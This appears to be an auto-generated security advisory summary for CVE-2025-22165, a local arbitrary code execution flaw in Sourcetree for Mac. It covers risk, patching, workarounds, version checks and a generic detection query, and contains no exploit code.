CVE-2025-22165
📋 TL;DR
This CVE-2025-22165 is a Medium severity Arbitrary Code Execution vulnerability in Sourcetree for Mac that allows a locally authenticated attacker to execute arbitrary code with high impact to confidentiality, integrity, and availability. It requires user interaction and affects Sourcetree for Mac users running version 4.2.8 or later. Attackers could potentially gain full control of affected systems.
💻 Affected Systems
- Sourcetree for Mac
📦 What is this software?
Sourcetree by Atlassian
⚠️ Risk & Real-World Impact
Worst Case
An attacker with local access could execute arbitrary code with the privileges of the Sourcetree application, potentially leading to full system compromise, data theft, or ransomware deployment.
Likely Case
A malicious actor with local access could execute code to steal Git credentials, modify repositories, or install malware, requiring the user to interact with a malicious file or trigger.
If Mitigated
With proper access controls and user awareness, the risk is reduced to minimal impact as it requires local authentication and user interaction.
🎯 Exploit Status
Requires local authentication and user interaction. Found through Atlassian Bug Bounty Program, suggesting responsible disclosure.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Latest version available at https://www.sourcetreeapp.com/download-archives
Vendor Advisory: https://jira.atlassian.com/browse/SRCTREE-8217
Restart Required: Yes
Instructions:
1. Download latest Sourcetree for Mac from https://www.sourcetreeapp.com/download-archives. 2. Install the update. 3. Restart Sourcetree application.
🔧 Temporary Workarounds
Restrict local access
allLimit local access to systems running vulnerable Sourcetree versions to trusted users only.
User awareness training
allEducate users about not opening untrusted files or repositories in Sourcetree.
🧯 If You Can't Patch
- Restrict Sourcetree usage to essential personnel only and monitor for suspicious activity.
- Implement application whitelisting to prevent execution of unauthorized binaries from Sourcetree context.
🔍 How to Verify
Check if Vulnerable:
Check Sourcetree version in application menu → About Sourcetree. If version is 4.2.8 or later (and not the latest patched version), you are vulnerable.Check Version:
Open Sourcetree, go to Sourcetree menu → About SourcetreeVerify Fix Applied:
After updating, verify version in About Sourcetree matches latest version from download center.📡 Detection & Monitoring
Log Indicators:
- Unusual process execution from Sourcetree context
- Suspicious file operations in Git repositories
Network Indicators:
- Unexpected outbound connections from Sourcetree process
SIEM Query:
process.name:"Sourcetree" AND (process.parent.name NOT IN ["launchd", "loginwindow", "bash", "zsh"] OR process.cmdline CONTAINS suspicious_pattern)